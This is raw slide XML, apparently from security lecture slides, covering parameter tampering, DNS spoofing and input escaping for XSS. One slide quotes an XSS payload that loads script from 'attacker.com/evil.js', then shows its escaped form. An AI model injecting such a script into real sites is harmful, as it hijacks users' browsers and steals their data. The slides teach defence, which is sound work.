        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t>Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1618487"/>
            <a:ext cx="9765453" cy="1001983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Is the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>check in the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>previous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="3803261"/>
            <a:ext cx="979593" cy="803509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="82125" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="645"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="507"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr sz="2133">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050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DNS Spoofing (4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593889" y="1219199"/>
            <a:ext cx="11868345" cy="4832809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. How can Trudy supply a fake DNS reply that appears to be real?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A bit more difficult. DNS checks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reply is from authoritative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (e.g., .com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reply ID that matches the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reply is for outstanding query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• (Nothing about content though …)</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455244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1613950" y="450638"/>
            <a:ext cx="8960273" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1616455"/>
            <a:ext cx="10389445" cy="4465197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="25400" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="884745" algn="just">
              <a:lnSpc>
                <a:spcPct val="98500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Sanitize untrusted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>before </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>outputting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-767" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>entities functions, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>escapes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-767" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘special’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>characters.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="513" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="473" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>becomes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="47"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="4200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" algn="just"/>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Our</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> input,</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" algn="just"/>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http://attacker.com/evil.js"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>becomes</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" algn="just">
              <a:spcBef>
                <a:spcPts val="1173"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-107" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src=&amp;quot;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://attacker.com/evil.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" algn="just">
              <a:spcBef>
                <a:spcPts val="1259"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>browser.</a:t>
            </a:r>
            <a:endParaRPr sz="3467">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1626142" y="450638"/>
            <a:ext cx="8939953" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>Sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1618487"/>
            <a:ext cx="10159153" cy="3031365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="21167" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPct val="99100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="167"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2088674" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Wh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>outpu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
